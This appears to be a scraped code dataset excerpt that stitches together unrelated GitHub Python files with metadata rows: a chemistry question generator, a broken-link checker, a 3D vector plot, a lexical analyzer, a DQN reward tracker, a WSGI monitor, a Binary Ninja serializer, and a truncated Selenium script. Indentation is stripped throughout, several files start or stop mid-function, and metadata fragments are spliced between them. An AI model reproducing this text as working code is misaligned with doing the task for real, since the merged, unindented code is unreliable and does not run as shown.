check2switch = "\(\d+\.?\d* mmol, \d+\.?\d* mg\)|\(\d+\.?\d* mmol, \d+\.?\d* g\)\(\d+\.?\d* mmol, \d+\.?\d* mL\)\(\d+\.?\d* mmol, \d+\.?\d* gr\)\(\d+\.?\d* mmol, \d+\.?\d* ml\)"
while re.search(check2switch, context) is not None:
cc = re.search(check2switch, context)
split_to_reorder = re.split("\(|,|\)", cc.group())
context = context.replace(cc.group(), "( " + split_to_reorder[2] + ", " + split_to_reorder[1] + " )")
split_by_sentence = context.split(". ")
if len(split_by_sentence[-1]) == 0:
dropped_additional = context.replace(split_by_sentence[-2], '')
# dropped_additional = dropped_additional.replace(split_by_sentence[-3], '')
start_search = -3
else:
dropped_additional = context.replace(split_by_sentence[-1], '')
# dropped_additional = dropped_additional.replace(split_by_sentence[-2], '')
start_search = -2
succeed = False
while not succeed:
try:
product_amount = re.search("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)",
split_by_sentence[start_search]).group()
except:
if start_search < -20:
return None, None
start_search -= 1
continue
succeed = True
vars_and_vals_list = re.split("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)", dropped_additional)
vars_and_vals_list = [i for i in vars_and_vals_list if i is not None and i is not '']
for item in vars_and_vals_list:
if re.search("[a-z]+", item) is None:
vars_and_vals_list.remove(item)
vars_and_vals = []
for i in range(len(vars_and_vals_list) // 2):
if re.search("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)",
vars_and_vals_list[2 * i]) is not None:
prev_sentence = vars_and_vals_list[2 * i + 1].split()
vars_and_vals.append(
[prev_sentence[0] if len(prev_sentence) == 1 else (
prev_sentence[1][1:] if prev_sentence[1].startswith("(") else prev_sentence[1]),
vars_and_vals_list[2 * i]])
else:
idx = -1
comp_name = ""
prev_parts = vars_and_vals_list[2 * i].split()
while re.search("[a-z|0-9]+", comp_name) is None:
comp_name += prev_parts[idx]
idx -= 1
vars_and_vals.append(
[comp_name[1:] if comp_name.startswith("(") else comp_name, vars_and_vals_list[2 * i + 1]])
return vars_and_vals, product_amount
def get_time_from_question(question):
return re.findall(", for (.*),", question)[0]
def generate_duration(row, desired_output):
# function_lists = [if_the_temprature_passes, We_discovered_that_if_the_amount_of, overheat_the, if_we_heat,
# stirring_the_mixture_longer, if_the_temperature_exceed, if_we_cool_the_mixture]
generated_temp, temp_threshold_str, loss_str, generated_duration, heat_duration_str, name = None, None, None, None, None, None
unit = None
if None not in if_the_temprature_passes(row):
temp_threshold_str, loss_str, heat_duration_str, name = if_the_temprature_passes(row)
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
generated_duration = float(re.findall("(\d+)", heat_duration_str[0])[0]) + random.randint(0, 10)
unit = random.choice(["minutes", "hours"])
question = f"if we heat to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in We_discovered_that_if_the_amount_of(row):
temp_threshold_str, loss_str, quantity_threshold, threshold_comp_name = We_discovered_that_if_the_amount_of(row)
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
generated_duration = random.randint(0, 10)
generate_quantity = float(quantity_threshold[0].split()[0]) + random.uniform(
float(quantity_threshold[0].split()[0]), 10)
unit = random.choice(["minutes", "hours"])
question = f"if the {threshold_comp_name[0]} was over {generate_quantity}, we cool the mixture to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in overheat_the(row):
temp_threshold_str, loss_str, decrease_ratio_str, product_name = overheat_the(row)
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
generated_duration = random.randint(0, 10)
unit = random.choice(["minutes", "hours"])
question = f"if we heat the {product_name[0]} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in if_we_heat(row):
temp_threshold_str, loss_str, name = if_we_heat(row)
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
generated_duration = random.randint(0, 10)
unit = random.choice(["minutes", "hours"])
question = f"if we heat the {name[0]} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in stirring_the_mixture_longer(row):
loss_str, _, name = stirring_the_mixture_longer(row)
name = name[0]
generated_temp = random.randint(-100, 100)
unit = random.choice(["minutes", "hours"])
generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
question = f"if we heat the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in if_the_temperature_exceed(row):
temp_threshold_str, loss_str, name = if_the_temperature_exceed(row)
unit = random.choice(["minutes", "hours"])
generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
question = f"if we heat the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
if None not in if_we_cool_the_mixture(row):
temp_threshold_str, loss_str, name = if_we_cool_the_mixture(row)
unit = random.choice(["minutes", "hours"])
generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-50, 50)
question = f"if we cool the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
return generated_temp, temp_threshold_str, loss_str, str(
generated_duration) + " " + unit, heat_duration_str, name, question
# --------- \end function for generating the question -------
def generate_question_type5(row):
vars_and_vals = get_reactors_and_output(row)
question = "how many moles of the product does the process yield ?"
try:
if vars_and_vals[0][-1][0] in not_a_compound_list:
raise NameError
validity_check = pcp.get_compounds(vars_and_vals[0][-1][0], 'name')[0].exact_mass
except:
return "", ""
code = f"molar_mass = pcp.get_compounds( \"{vars_and_vals[0][-1][0]}\", 'name')[0].exact_mass [EOL]" \
f"molar_mass = float ( molar_mass ) [EOL]" \
f"yielded_grams = to_gr(\" {vars_and_vals[0][-1][1]} \") [EOL]" \
f"return yielded_grams / molar_mass [EOL]"
return question, code
def generate_question_type6(row): # debugged
vars_and_vals = get_reactors_and_output(row)
product_quantity = vars_and_vals[0][-1]
desired_output = randomize_product_amount(vars_and_vals)
try:
reactor_chosen = random.choice(vars_and_vals[0][:-1])
except:
return "", ""
reactor_name = reactor_chosen[0]
reactor_weight = reactor_chosen[1]
try:
if reactor_name in not_a_compound_list:
raise NameError
validity_check = pcp.get_compounds({reactor_name}, 'name')[0].exact_mass
except:
return "", ""
question = f"how many moles of {reactor_name} do we need to get {desired_output} of the product ?"
code = f"desired_product = to_gr( ' {desired_output} ' ) [EOL]" \
f"product_described = to_gr( ' {product_quantity[1]} ' ) [EOL]" \
f"described_component = to_gr( ' {reactor_weight} ') [EOL]" \
f"needed_reactor = desired_product / product_described * described_component [EOL]" \
f"reactor_molar_weight = pcp.get_compounds( \"{reactor_name}\" , 'name')[0].exact_mass [EOL]" \
f"return ( needed_reactor / float( reactor_molar_weight ) ) [EOL]"
return question, code
def generate_question_type7(row): # debugged
vars_and_vals = get_reactors_and_output(row)
chosen_atom = random.choice(atoms_list).strip()
compound_name = vars_and_vals[0][-1][0].replace('.', '')
try:
if compound_name in not_a_compound_list:
raise NameError
validity_check = pcp.get_compounds(compound_name, 'name')[0].elements
except:
return "", ""
print("detected compound : ", compound_name)
question = f"Is {chosen_atom} present in the product ?"
code = f"chosen_atom = pcp.get_compounds( \" {chosen_atom} \" , 'name')[0].molecular_formula [EOL]" \
f"product_elements = pcp.get_compounds( \"{compound_name}\" , 'name')[0].elements [EOL]" \
f"return chosen_atom in product_elements [EOL]"
return question, code
def generate_question_type1(row): # debugged
vars_and_vals = get_reactors_and_output(row)
desired_output = randomize_product_amount(vars_and_vals)
question_1 = f"how much do we need from each of the reactors to get {desired_output} of the final product ?" # TODO V2 : add an environmental condtion
code_1 = f"desired_product = to_gr( \" {desired_output} \" )[EOL]" \
f"components = {vars_and_vals[0][:-1]} [EOL]" \
f"product_described = to_gr( \" {vars_and_vals[1]} \" )[EOL]" \
f"portions_needed = ( desired_product ) /100 [EOL]" \
f"needed_reactors = [[reactor [ 0 ] , to_gr( reactor [ 1 ] ) * portions_needed] for reactor in components] [EOL]" \
f"return needed_reactors [EOL]"
code_1 = formulate_code(code_1)
return question_1, code_1
def generate_question_type2(row): # debugged
vars_and_vals = get_reactors_and_output(row)
q_vars, q_list = generate_reactors(vars_and_vals[0][:-1])
q_list = [[q[1], q[0]] for q in q_list]
if len(vars_and_vals[0][:-1]) < 1:
return "", ""
question2 = f"we have {q_vars}, how can we optimize the process?" # TODO V2 : add an environmental conditions
code_2 = f"components = {vars_and_vals[0][:-1]} [EOL]" \
f"have_components = {q_list} [EOL]" \
f"min_portion = float( 'inf' ) [EOL]" \
f"for component, needed in zip ( components , have_components ) : [EOL]" \
f"[TAB]portions = to_gr( component [ 1 ] ) / to_gr( needed [ 1 ] ) [EOL]" \
"[TAB]if portions < min_portion : [EOL]" \
"[TAB][TAB]min_portion = portions [EOL]" \
"optimized = [] [EOL]" \
"for need, have in zip ( components , have_components ) : [EOL]" \
"[TAB]optimized.append( [ have[0] , to_gr( have [1] ) - to_gr ( need [1] ) * min_portion ] ) [EOL]" \
"return optimized [EOL]"
code_2 = formulate_code(code_2)
return question2, code_2
def generate_question_type3(row): # debugged
vars_and_vals = get_reactors_and_output(row)
q_vars, q_list = generate_reactors(vars_and_vals[0][:-1])
question_3 = f"we have {q_vars} how much can we create of the final product?" # TODO V2 : add an environmental conditions
code_3 = f"available_reactors = {get_vars_from_question(q_vars)} [EOL]" \
f"components = {vars_and_vals[0][:-1]} [EOL]" \
f"product_described = to_gr( \" {vars_and_vals[1]} \" ) [EOL]" \
f"minimal_product_portion = float( 'inf' ) [EOL]" \
f"for needed, have in zip ( components , available_reactors ): [EOL]" \
f"[TAB]tmp_min_portion = to_gr( have [ 1 ] ) / to_gr( needed[1] ) [EOL]" \
f"[TAB]if tmp_min_portion < minimal_product_portion : [EOL]" \
f"[TAB][TAB]minimal_product_portion = tmp_min_portion [EOL]" \
f"return minimal_product_portion * product_described [EOL]"
code_3 = formulate_code(code_3)
return question_3, code_3
def generate_question_type4(row): # CONTINUE HEREEEE
vars_and_vals = get_reactors_and_output(row)
desired_output = randomize_product_amount(vars_and_vals)
generated_temp, temp_threshold_str, loss_str, generated_duration, heat_duration_str, name, question_4 = generate_duration(
row, desired_output)
if heat_duration_str is None:
return None, None
code_4 = f"time = to_minute( \" {get_time_from_question(question_4)} \" ) [EOL]" \
f"loss = \'{loss_str[0]}\' [EOL]" \
f"components = {vars_and_vals[0][:-1]} [EOL]" \
f"described_product_amount = to_gr( \" {desired_output} \" ) [EOL]" \
f"threshold_duration = to_minute( \" {heat_duration_str} \" ) [EOL]" \
f"temprature = {generated_temp} [EOL]" \
f"threshold_temp = {temp_threshold_str} [EOL]" \
f"final_product_amount = described_product_amount [EOL]" \
f"for t in range( time ): [EOL]" \
f"[TAB]if t > threshold_duration and temprature > threshold_temp: [EOL]" \
f"[TAB][TAB]final_product_amount = compensate_for_loss( loss= loss[0], current_value= final_product_amount) [EOL]" \
f"portions = final_product_amount / described_product_amount [EOL]" \
f"return [[component[0], to_gr(component[1]) * portions] for component in components] [EOL]"
code_4 = formulate_code(code_4)
answe_4 = execute
return question_4, code_4
data = json.load(open("gpt4-parsed-uspto.json", "r", encoding="utf-8"))
for idx, entry in enumerate(data):
q1, c1 = generate_question_type1(row=entry)
q2, c2 = generate_question_type2(row=entry)
q3, c3 = generate_question_type3(row=entry)
q4, c4 = generate_question_type4(row=entry)
print(c4)
| arrafmousa/generate_code | generate_questiontion_with_chempy.py | generate_questiontion_with_chempy.py | py | 25,754 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.search",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 143... |
74473073385 | import urllib.request, urllib.parse
import bs4 as BeautifulSoup
# 建立与用户以及网络的会话
base = input("Enter the URL: ")
try:
page = urllib.request.urlopen(base)
except:
print("Cannot open %s" % base)
quit()
# 准备soup
soup = BeautifulSoup.BeautifulSoup(page)
# 提取链接,并用(名称,网址)的元组表示
links = [(link.string, link['href']) for link in soup.find_all("a") if link.has_attr("href")]
# 尝试打开每个链接
broken = False
for name, url in links:
# 将base和链接目标组合在一起,因为页面内的链接都是相对地址,所以这里要与base结合在一起
# 例如: base=http://hanwen.me url=/about
# dest = http://hanwen.me/about
dest = urllib.parse.urljoin(base, url)
print(dest)
try:
page = urllib.request.urlopen(dest)
page.close()
except:
print("Link \"%s\" to \"%s\" is probably broken." %(name, dest))
broken = True
# 显示好消息
if not broken:
print("Page %s does not seem to have broken links. " %base) | zhanwen/PythonDataScience | chapter3/practice/Solution_Broken_link.py | Solution_Broken_link.py | py | 1,067 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 7,
"usage_type": "name"
},
{
"api_name":... |
6171283144 | import matplotlib.pyplot as plt
import numpy as np
from numpy import *
from mpl_toolkits import mplot3d
import random
# Presets
ax = plt.axes(projection='3d')
def randomcolor():
colorArr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
color = ""
for i in range(6):
color += colorArr[random.randint(0, 14)]
return "#" + color
class Group(object):
def __init__(self):
self.vectors = []
def register(self, *v: ndarray):
for i in v:
self.vectors.append(i)
def display(self):
temp = []
color_p = randomcolor()
for i in self.vectors:
for j in range(len(i)):
temp.append(i[j])
ax.quiver(0, 0, 0, temp[0], temp[1], temp[2], arrow_length_ratio=0.1, color=color_p)
ax.scatter3D(temp[0], temp[1], temp[2], color=color_p, s=2500)
temp = []
def rotate(self, theta: 2 * pi):
rotation_matrix = array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
for i in range(len(self.vectors)):
self.vectors[i] = dot(rotation_matrix, self.vectors[i])
def initial():
x = np.arange(-6, 6, 0.1)
y = np.zeros(120)
ax.plot(x, y, y, color='#000000')
ax.plot(y, x, y, color='#000000')
ax.plot(y, y, x, color='#000000')
ax.set_xlim(-2, 2)
ax.set_ylim(-2, 2)
ax.set_zlim(-2, 2)
plt.gca().set_box_aspect((1, 1, 1))
plt.show()
def main():
a1 = array([[1], [1], [1]])
a2 = array([[-1], [-1], [1]])
a3 = array([[1], [-1], [-1]])
a4 = array([[-1], [1], [-1]])
G1 = Group()
G1.register(a1, a2, a3, a4)
G1.display()
G1.rotate(pi / 6)
G1.display()
initial()
if __name__ == '__main__':
main()
| RS-gty/GTY_Chemistry | Group.py | Group.py | py | 1,802 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.axes",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.cos",
... |
14431724379 | #from ast import If
#from pprint import pp
#from typing import final
from doctest import master
from multiprocessing.reduction import duplicate
import re
import string
from struct import pack
from unittest import result
from tokens import tokens
from tkinter import *
from tkinter import ttk
#from Interfaz import datos
resultReservadas = []
resultCaracteresEspeciales = []
resultDelimitadores = []
resultIndefinidas = []
resultErrores = []
resultDigitos = []
listResultados = []
class analizador:
tokens = tokens()
def inicio_analizador(self, palabras):
resultReservadas = []
resultCaracteresEspeciales = []
resultDelimitadores = []
resultDigitos = []
resultIndefinidas = []
resultErrores = []
print("--- Lexico ---")
for i in tokens.reservadas:
for j in palabras:
if (i == j):
resultReservadas.append(i)
palabras.remove(i)
for l in tokens.caracteres_especiales:
for k in palabras:
if (l == k):
resultCaracteresEspeciales.append(k)
palabras.remove(l)
for t in tokens.delimitadores:
for f in palabras:
if (t == f):
resultDelimitadores.append(t)
palabras.remove(t)
for g in range (len(palabras)):
#dato = re.search("^[A-Za-z]+$*", palabras[g])
dato = re.search("^[a-zA-Z][a-zA-Z]+$", palabras[g])
if dato:
resultIndefinidas.append(palabras[g])
else:
dato1 = re.search("^[0-9]+$", palabras[g])
if dato1:
resultDigitos.append(palabras[g])
else:
resultErrores.append(palabras[g])
print("Token Reservadas: ",resultReservadas)
print("Token Caracteres Especiales: ",resultCaracteresEspeciales)
print("Token Delimitadores: ",resultDelimitadores)
print("Token Indefinidas: ",resultIndefinidas)
print("Token Digitos: ",resultDigitos)
print("Errores: ",resultErrores)
listResultados.append(resultReservadas)
listResultados.append(resultCaracteresEspeciales)
listResultados.append(resultDelimitadores)
listResultados.append(resultIndefinidas)
listResultados.append(resultDigitos)
listResultados.append(resultErrores)
return listResultados
def funcAuxiliar(self, palabras):
# se buscan y se agregan a una lista los terminales
for i in tokens.reservadas:
for j in palabras:
if (i == j):
resultReservadas.append(i)
for l in tokens.caracteres_especiales:
for k in palabras:
if (l == k):
resultCaracteresEspeciales.append(k)
for t in tokens.delimitadores:
for f in palabras:
if (t == f):
resultDelimitadores.append(t)
# evaluando la cantidad existentes
c = 0
s = 0
p = 0
d = 0
cs = 0
i = 0
pa = 0
pc = 0
dp = 0
up = 0
for cantidadReservadas in resultReservadas:
if cantidadReservadas == "class":
print("encontro un class")
c += 1
if cantidadReservadas == "self":
print("encontro un self")
s += 1
if cantidadReservadas == "print":
print("encontro un print")
p += 1
if cantidadReservadas == "def":
print("encontro un def")
d += 1
for cantidadCaracteres in resultCaracteresEspeciales:
if cantidadCaracteres == "'":
print("encontro un ' ")
cs += 1
for cantidadDelimitadores in resultDelimitadores:
if cantidadDelimitadores == "=":
print("encontro un = ")
i += 1
if cantidadDelimitadores == "(":
print("encontro un ( ")
pa += 1
if cantidadDelimitadores == ")":
print("encontro un ) ")
pc += 1
if cantidadDelimitadores == ":":
print("encontro un : ")
dp += 1
if cantidadDelimitadores == ".":
print("encontro un . ")
up += 1
if c == 1 and s == 1 and p == 1 and d == 1 and cs == 2 and i == 2 and pa == 5 and pc == 5 and dp == 1 and up == 1:
print("CUMPLE")
palabras.remove("class")
palabras.remove("self")
palabras.remove("def")
palabras.remove("print")
palabras.remove("'")
palabras.remove("'")
palabras.remove("=")
palabras.remove("=")
palabras.remove("(")
palabras.remove("(")
palabras.remove("(")
palabras.remove("(")
palabras.remove("(")
palabras.remove(")")
palabras.remove(")")
palabras.remove(")")
palabras.remove(")")
palabras.remove(")")
palabras.remove(":")
palabras.remove(".")
print(palabras)
else:
print("NO CUMPLE")
#print("Existentes REPETIDOS:", existentes)
#print("Reservadas: ",resultReservadas)
#print("Caracteres especiales: ",resultCaracteresEspeciales)
#print("Delimitadores: ",resultDelimitadores)
#print(palabras)
| AngelHernandez20/191180-191280 | analizadorlexico.py | analizadorlexico.py | py | 5,673 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "tokens.tokens",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "tokens.tokens.reservadas",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "tokens.tokens",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "tokens.toke... |
71234511143 | #!/usr/bin/env python
#
# An example on how to read the YAML output from etisnoop
# Pipe etisnoop to this script
#
# License: public domain
import sys
import yaml
for frame in yaml.load_all(sys.stdin):
print("FIGs in frame {}".format(frame['Frame']))
for fib in frame['LIDATA']['FIC']:
if fib['FIGs']:
for fig in fib['FIGs']:
print(" FIG " + fig['FIG'])
| Opendigitalradio/etisnoop | yamlexample.py | yamlexample.py | py | 401 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "yaml.load_all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 11,
"usage_type": "attribute"
}
] |
71514879785 | import sys
import time
import numpy as np
import torch
import torch.nn as nn
class RewardTracker:
def __init__(self, writer, stop_reward, group_rewards=1):
self.writer = writer
self.stop_reward = stop_reward
self.reward_buf = []
self.steps_buf = []
self.group_rewards = group_rewards
def __enter__(self):
self.ts = time.time()
self.ts_frame = 0
self.total_rewards = []
self.total_steps = []
return self
def __exit__(self, *args):
self.writer.close()
def reward(self, reward_steps, frame, epsilon=None):
reward, steps = reward_steps
self.reward_buf.append(reward)
self.steps_buf.append(steps)
if len(self.reward_buf) < self.group_rewards:
return False
reward = np.mean(self.reward_buf)
steps = np.mean(self.steps_buf)
self.reward_buf.clear()
self.steps_buf.clear()
self.total_rewards.append(reward)
self.total_steps.append(steps)
speed = (frame - self.ts_frame) / (time.time() - self.ts)
self.ts_frame = frame
self.ts = time.time()
mean_reward = np.mean(self.total_rewards[-100:])
mean_steps = np.mean(self.total_steps[-100:])
epsilon_str = "" if epsilon is None else ", eps %.2f" % epsilon
print("%d: done %d games, mean reward %.3f, mean steps %.2f, speed %.2f f/s%s" % (
frame, len(self.total_rewards)*self.group_rewards, mean_reward, mean_steps, speed, epsilon_str
))
sys.stdout.flush()
if epsilon is not None:
self.writer.add_scalar("epsilon", epsilon, frame)
self.writer.add_scalar("speed", speed, frame)
self.writer.add_scalar("reward_100", mean_reward, frame)
self.writer.add_scalar("reward", reward, frame)
self.writer.add_scalar("steps_100", mean_steps, frame)
self.writer.add_scalar("steps", steps, frame)
if mean_reward > self.stop_reward:
print("Solved in %d frames!" % frame)
return True
return False
def calc_values_of_states(states, net, device="cpu"):
""" action_values_v = net(states_v):這裡,模型net為給定的states_v預測每個可能動作的價值。
best_action_values_v = action_values_v.max(1)[0]:接著,我們只考慮每個狀態的最佳動作價值,這是透過取每一行(代表每個狀態)的最大值來完成的。
結果是所有狀態的最佳動作價值的均值。
回答你的問題:“假設我部位完全沒有任何的變化下,收益為什麼會改變?”:
即使部位方向不變,模型的權重和偏差是在訓練過程中不斷更新的。所以,當你使用同一組states重新評估模型時,你會得到不同的動作價值,因為模型已經學到了新的知識。
動作價值的改變並不直接代表收益的改變。它只是模型對給定狀態應該採取何種動作的估計價值。當你在真實環境中執行這些動作時,真正的收益可能會與模型的估計有所不同。
訓練過程中,模型試圖學習一個策略,使其預測的動作價值越來越接近真實價值。但這不代表模型總是正確的,只是說它試圖接近真實價值。
所以,雖然部位方向不變,但模型的估計動作價值可能會變,這反映了模型在訓練過程中的學習進展。
Args:
states (_type_): _description_
net (_type_): _description_
device (str, optional): _description_. Defaults to "cpu".
Returns:
_type_: _description_
"""
mean_vals = []
for batch in np.array_split(states, 64):
states_v = torch.tensor(batch).to(device)
action_values_v = net(states_v)
best_action_values_v = action_values_v.max(1)[0]
mean_vals.append(best_action_values_v.mean().item())
return np.mean(mean_vals)
def unpack_batch(batch):
states, actions, rewards, dones, last_states = [], [], [], [], []
for exp in batch:
state = np.array(exp.state, copy=False)
states.append(state)
actions.append(exp.action)
rewards.append(exp.reward)
dones.append(exp.last_state is None)
if exp.last_state is None:
last_states.append(state) # the result will be masked anyway
else:
last_states.append(np.array(exp.last_state, copy=False))
return np.array(states, copy=False), np.array(actions), np.array(rewards, dtype=np.float32), \
np.array(dones, dtype=np.uint8), np.array(last_states, copy=False)
def calc_loss(batch, net, tgt_net, gamma, device="cpu"):
states, actions, rewards, dones, next_states = unpack_batch(batch)
states_v = torch.tensor(states).to(device)
next_states_v = torch.tensor(next_states).to(device)
actions_v = torch.tensor(actions).to(device)
rewards_v = torch.tensor(rewards).to(device)
done_mask = torch.tensor(dones, dtype=torch.bool).to(device)
state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)
next_state_actions = net(next_states_v).max(1)[1]
next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)
next_state_values[done_mask] = 0.0
expected_state_action_values = next_state_values.detach() * gamma + rewards_v
return nn.MSELoss()(state_action_values, expected_state_action_values)
| a046829713/DQNStockSysteam | lib/common.py | common.py | py | 5,518 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 39,
... |
26224523041 | import xml.etree.ElementTree as ET
import time
import requests
class BaseAPIConnector(object):
def __init__(self, user_agent='', verbose=False):
self.user_agent = user_agent
self.verbose = verbose
def construct_url(self):
return None
def html_request(self):
if self.user_agent == '':
raise UserWarning('Please specify a user agent.')
url = self.construct_url()
if self.verbose:
print(url)
request = None
exception_count = 0
while exception_count < 10:
try:
request = requests.get(url, headers={'User-Agent': self.user_agent})
except Exception as e:
print("Exception '%s' while querying url: '%s', trying again..." % (e, url))
time.sleep(10)
exception_count += 1
else:
break
return request
def get_xml_from_url(self):
try:
return ET.fromstring(self.html_request().text)
except:
return None
def get_json_from_url(self):
return self.html_request().json() | TheOneWho/EveCommonLibrary | EveCommon/BaseAPIConnector.py | BaseAPIConnector.py | py | 1,149 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree.fromstring",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "xml.etree.El... |
20026451101 | from hashlib import sha1
import time
import json
from pulsar import get_actor, Future
from pulsar.apps.wsgi import WSGIServer, WsgiResponse, WsgiHandler
import aio_etcd as etcd
from jirachi.io.abstract import JirachiMonitor, JirachiMonitorNotFound
from pulsar.apps.wsgi import Router
__all__ = ['RemoteMonitorWSGI']
blueprint = Router('/')
@blueprint.router('/remote/<string:monitor>/event/<string:event>/', methods=['post'])
async def remote_wsgi(request):
hash_code = sha1(str(time.time()).encode()).hexdigest()
monitor_name = request.urlargs['monitor']
event_name = request.urlargs['event']
data = request.body_data
actor = get_actor()
monitor = actor.get_actor(monitor_name)
if monitor:
monitor.fire_event(event_name, data)
elif not (actor.is_arbiter() or actor.is_monitor() and actor.monitor == monitor):
actor.monitor.fire_event(event_name, msg=data)
else:
raise JirachiMonitorNotFound('Cant found Monitor %s' % monitor)
return WsgiResponse(200, json.dumps({
'successed': True,
'token': hash_code
}))
class RemoteMonitorWSGI(WSGIServer, JirachiMonitor):
name = 'remote_monitor'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cfg.callable = WsgiHandler((blueprint, ))
if not hasattr(self.cfg, 'blacklist'):
self.cfg.blacklist = []
@staticmethod
async def singlecast(msg, actor_name):
actor = get_actor()
if not actor.name == actor_name:
actor = actor.get_actor(actor_name)
if not actor and actor.monitor.name == actor.name:
actor = actor.monitor
actor.fire_event('singlecast', msg)
actor.future = Future()
return actor.future
@staticmethod
def event_test(msg):
print('test event %s' % msg)
async def monitor_start(self, monitor, exec=None):
monitor.bind_event('test', self.event_test)
if not hasattr(self.cfg, 'etcdconf'):
monitor.etcd = etcd.Client()
else:
monitor.etcd = etcd.Client(**self.cfg.etcdconf)
await super().monitor_start(monitor)
async def worker_start(self, worker, *args, **kwargs):
worker.bind_event('test', self.event_test)
async def search_remote(self):
pass
async def sync_remote(self):
pass
| RyanKung/jirachi | jirachi/io/remote/monitor.py | monitor.py | py | 2,379 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "pulsar.apps.wsgi.Router",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "hashlib.sha1",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pulsar.get_actor",
... |
35260765665 | from binaryninja import *
import xxhash
################################################################################################################
# MLIL Instruction #
################################################################################################################
class Neo4jInstruction:
def __init__(self, instr: mediumlevelil.MediumLevelILInstruction, context, parent_type: str):
self.instr = instr
self.parent_type = parent_type
self.operands = str(instr.operands)
self.context = context
if self.parent_type == 'BasicBlock':
self.relationship_label = 'InstructionChain'
else:
self.relationship_label = 'NextInstruction'
self.context.set_hash(self.instr_hash())
def instr_hash(self):
instruction_hash = xxhash.xxh64()
instruction_hash.update(str(self.instr.operands) + str(self.instr.operation))
return instruction_hash.hexdigest()
def serialize(self):
csv_template = {
'mandatory_node_dict': {
'HASH': self.context.SelfHASH,
'LABEL': 'Instruction',
},
'mandatory_relationship_dict': {
'START_ID': self.context.ParentHASH,
'END_ID': self.context.SelfHASH,
'TYPE': self.relationship_label,
'StartNodeLabel': self.parent_type,
'EndNodeLabel': 'Instruction',
'AssemblyOffset': self.instr.address,
},
'mandatory_context_dict': self.context.get_context(),
'node_attributes': {
},
'relationship_attributes': {
'InstructionIndex': self.instr.instr_index,
'PossibleValues': self.instr.possible_values.type.value,
'VarsRead': [var.name for var in self.instr.vars_read],
'VarsWritten': [var.name for var in self.instr.vars_written],
},
}
return csv_template
| CySHell/Binja4J | Core/extraction_helpers/Instruction.py | Instruction.py | py | 2,116 | python | en | code | 15 | github-code | 36 | [
{
"api_name": "xxhash.xxh64",
"line_number": 25,
"usage_type": "call"
}
] |
30473232781 | from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from tkinter import messagebox
import time
import os
from App.Login import username, password, security_question
class Core:
def __init__(self, file_path, driver):
self.driver = driver
self.file_path = file_path
self.file_content = self.readFileContent()
self.file_name = os.path.split(file_path)[1]
self.IDs_list = []
if self.file_content:
try:
self.collectCheckboxsIDs()
self.selectCheckbox()
